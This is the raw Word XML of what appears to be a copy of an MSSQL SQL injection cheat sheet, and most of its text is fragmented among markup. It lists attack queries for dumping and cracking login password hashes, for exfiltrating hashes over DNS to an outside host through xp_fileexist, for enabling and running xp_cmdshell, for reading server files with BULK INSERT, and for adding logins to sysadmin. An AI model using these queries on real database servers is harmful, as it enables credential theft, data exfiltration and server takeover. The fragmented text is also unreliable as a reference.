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6E" w:rsidRPr="00101B6E" w:rsidRDefault="00101B6E" w:rsidP="00101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10500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8297"/>
      </w:tblGrid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 @@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version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Comments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1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comment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>SELECT /*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comment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*/1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user_name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system_user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loginame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sysprocesses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@@SPID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Hashes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sysxlogins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mssql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2000;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master.dbo.fn_varbintohexstr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sysxlogins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mssql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2000. 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Need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convert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hex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hashes in MSSQL error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message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/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version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of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query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analyzer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password_hash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master.sys.sql_logins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mssql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2005;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+ ‘-’ +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master.sys.fn_varbintohexstr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password_hash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)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from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master.sys.sql_logins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mssql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2005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Cracker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MSSQL 2000 and 2005 Hashes are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both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SHA1-based. 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"https://labs.portcullis.co.uk/application/phrasen-drescher/"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phrasen|drescher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 can crack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these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Privileges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 particular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object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in 2005, 2008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permission_name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fn_my_permissions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null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‘DATABASE’);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database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permission_name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fn_my_permissions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null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‘SERVER’);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server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permission_name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fn_my_permissions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‘OBJECT’); –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table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permission_name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fn_my_permissions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‘USER’);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00101B6E" w:rsidRPr="00101B6E" w:rsidRDefault="00101B6E" w:rsidP="00101B6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–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permissions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in 2005, 2008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dbcreator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bulkadmin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diskadmin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processadmin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serveradmin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setupadmin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securityadmin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’);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00101B6E" w:rsidRPr="00101B6E" w:rsidRDefault="00101B6E" w:rsidP="00101B6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who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has a particular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? 2005, 2008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denylogin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0;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hasaccess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isntname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0;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isntgroup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0;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securityadmin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serveradmin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setupadmin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processadmin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diskadmin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dbcreator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bulkadmin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1;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DBA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Accounts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your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account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?  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1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true, 0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false, NULL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invalid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role. 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Also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try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bulkadmin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systemadmin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 and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other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values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from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"http://msdn.microsoft.com/en-us/library/ms176015.aspx"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documentation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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br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is_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?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1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true, 0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false, NULL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invalid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role/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 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’1′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tested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2005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 DB_NAME()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sysdatabases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DB_NAME(N);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N = 0, 1, 2, …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id = (SELECT id FROM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mytable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DB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only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lastRenderedPageBreak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syscolumns.name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, TYPE_NAME(master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syscolumns.xtype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,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master..syscolumns.id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=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sysobjects.id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AND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sysobjects.name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=’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sometable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and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types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sometable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lastRenderedPageBreak/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Tables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‘U’; — use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‘V’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views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someotherdb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‘U’;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master..syscolumns.name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, TYPE_NAME(master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syscolumns.xtype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,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master..syscolumns.id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=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sysobjects.id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AND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sysobjects.name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=’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sometable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and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types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sometable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Find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Tables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From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– NB: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This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example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works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only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current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database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. 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If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you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wan’t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search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another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you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need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specify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e.g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.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replace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with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mydb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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).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sysobjects.name as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tablename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syscolumns.name as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columnname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JOIN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syscolumns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ON sysobjects.id = syscolumns.id WHERE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sysobjects.xtype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= ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’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this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lists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table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each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column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containing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Nth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Row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TOP 1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(SELECT TOP 9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</w:t>
            </w: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..</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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ORDER BY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ASC)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sq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ORDER BY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DESC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gets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9th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row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Nth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substring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abcd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’, 3, 1)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c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Bitwise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6 &amp; 2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6 &amp; 1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0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ASCII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Value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-&gt;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(0×41)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-&gt; ASCII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ascii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(‘A’) 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65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Casting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CAST(’1′ as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int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SELECT CAST(1 as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)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String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Concatenation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‘A’ + ‘B’ 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AB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If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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">IF (1=1) SELECT 1 ELSE SELECT 2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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1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Case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CASE WHEN 1=1 THEN 1 ELSE 2 END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1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Avoiding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Quotes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SELECT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(65)+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(66)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returns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AB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Time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Delay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 WAITFOR DELAY ’0:0:5′ — pause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for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5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seconds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Make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DNS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declare</w:t>
            </w:r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@host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varchar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(800);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@host =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master..</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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syslogins</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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;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(‘master..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xp_getfiledetails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”\’ + @host + ‘c$boot.ini”’);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nonpriv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works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2000declare @host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varchar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(800);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@host =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+ ‘-’ +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master.sys.fn_varbintohexstr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password_hash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) + ‘.2.pentestmonkey.net’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from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sys.sql_logins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;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xp_fileexist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”\’ + @host + ‘c$boot.ini”’);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works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2005– NB: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Concatenation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not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allowed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in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calls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these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hence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why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we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have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use @host. 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Messy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but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necessary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.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–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Also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check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out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theDNS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tunnel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feature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of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"http://sqlninja.sourceforge.net/sqlninja-howto.html"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sqlninja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Command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Execution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EXEC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xp_cmdshell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‘net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MSSQL 2005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you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need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to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reactivate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xp_cmdshell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first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as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it’s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disabled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by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default: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EXEC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sp_configure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‘show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advanced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options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’, 1;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RECONFIGURE;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EXEC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sp_configure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xp_cmdshell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’, 1;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RECONFIGURE;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Local File Access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CREATE TABLE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mydata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(line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varchar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(8000));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BULK INSERT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mydata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FROM ‘c:boot.ini’;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DROP TABLE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mydata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;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Hostname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, IP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SELECT HOST_NAME()</w:t>
            </w:r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lastRenderedPageBreak/>
              <w:t>Create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"http://msdn2.microsoft.com/en-us/library/ms173768.aspx"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sp_addlogin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 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pass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Drop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"http://msdn2.microsoft.com/en-us/library/ms189767.aspx"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sp_droplogin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 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’;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Make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DBA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EXEC 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begin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instrText xml:space="preserve"> HYPERLINK "http://msdn2.microsoft.com/en-us/library/ms186320.aspx" </w:instrTex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separate"/>
            </w:r>
            <w:r w:rsidRPr="00101B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0099BB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:eastAsia="es-AR"/>
              </w:rPr>
              <w:t>master.dbo.sp_addsrvrolemember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fldChar w:fldCharType="end"/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 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user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’, ‘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sysadmin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;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priv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Location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of DB files</w:t>
            </w:r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EXEC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sp_helpdb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master; –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location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of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master.mdf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EXEC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sp_helpdb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pubs; –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location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of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pubs.mdf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00101B6E" w:rsidRPr="00101B6E" w:rsidTr="00101B6E"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Default/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System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Databases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101B6E" w:rsidRPr="00101B6E" w:rsidRDefault="00101B6E" w:rsidP="00101B6E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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</w:pP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northwind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model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msdb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  <w:t xml:space="preserve">pubs —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not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on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</w:t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sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> server 2005</w:t>
            </w:r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br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00101B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4C5356"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:eastAsia="es-AR"/>
              </w:rPr>
              <w:t>tempdb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00437620" w:rsidRDefault="00437620">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00437620" w:rsidSect="00101B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6E"/>
    <w:rsid w:val="00101B6E"/>
    <w:rsid w:val="004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2186-00E4-45B3-980C-4E4C6515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1B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1024</Words>
  <Characters>5632</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>46</Lines>
  <Paragraphs>13</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>HP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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-27T22:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-27T22:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>